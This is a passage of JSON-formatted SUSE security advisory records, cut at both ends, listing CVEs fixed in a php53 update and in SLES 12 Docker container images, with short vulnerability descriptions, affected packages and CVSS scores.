corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "reporter": "Suse", "published": "2016-06-21T13:08:17", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "Security update for php53 (important)", "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", "CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "modified": "2016-06-21T13:08:17", "id": "SUSE-SU-2016:1638-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-11T05:54:19", "references": ["https://bugzilla.suse.com/975726", "https://bugzilla.suse.com/1056193"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12-docker-image-1.1.4-20171002.x86_64.rpm", "packageName": "sles12-docker-image-1.1.4", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12-docker-image-1.1.4-20171002.ppc64le.rpm", "packageName": "sles12-docker-image-1.1.4", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12-docker-image-1.1.4-20171002.s390x.rpm", "packageName": "sles12-docker-image-1.1.4", "arch": "s390x", "operator": "lt"}], "description": "The SUSE Linux Enterprise Server 12 container image has been updated to\n include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 are now included in the base\n image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n util-linux:\n\n - CVE-2015-5218\n - CVE-2016-5011\n - CVE-2017-2616\n\n cracklib:\n\n - CVE-2016-6318\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - openldap2\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - shadow\n - zypper\n\n", "edition": 1, "reporter": "Suse", "published": "2017-10-11T03:06:53", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Security update for SLES 12 Docker image (important)", "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6262", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2015-5218", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "modified": "2017-10-11T03:06:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html", "id": "SUSE-SU-2017:2699-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-11T05:54:20", "references": ["https://bugzilla.suse.com/975726", "https://bugzilla.suse.com/1056193"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12sp1-docker-image-1.0.7-20171002.s390x.rpm", "packageName": "sles12sp1-docker-image-1.0.7", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12sp1-docker-image-1.0.7-20171002.x86_64.rpm", "packageName": "sles12sp1-docker-image-1.0.7", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Containers", "OSVersion": "12", "packageVersion": "20171002", "packageFilename": "sles12sp1-docker-image-1.0.7-20171002.ppc64le.rpm", "packageName": "sles12sp1-docker-image-1.0.7", "arch": "ppc64le", "operator": "lt"}], "description": "The SUSE Linux Enterprise Server 12 SP1 container image has been updated\n to include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 SP1 are now included in the\n base image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n expat:\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n - CVE-2016-7056\n - CVE-2016-8610\n - CVE-2017-3731\n\n cracklib:\n\n - CVE-2016-6318\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n util-linux:\n\n - CVE-2016-5011\n - CVE-2017-2616\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n update-alternatives:\n\n - CVE-2015-0860\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - lua51\n - lvm2\n - netcfg\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - sg3_utils\n - shadow\n - zypper\n\n", "edition": 1, "reporter": "Suse&qu
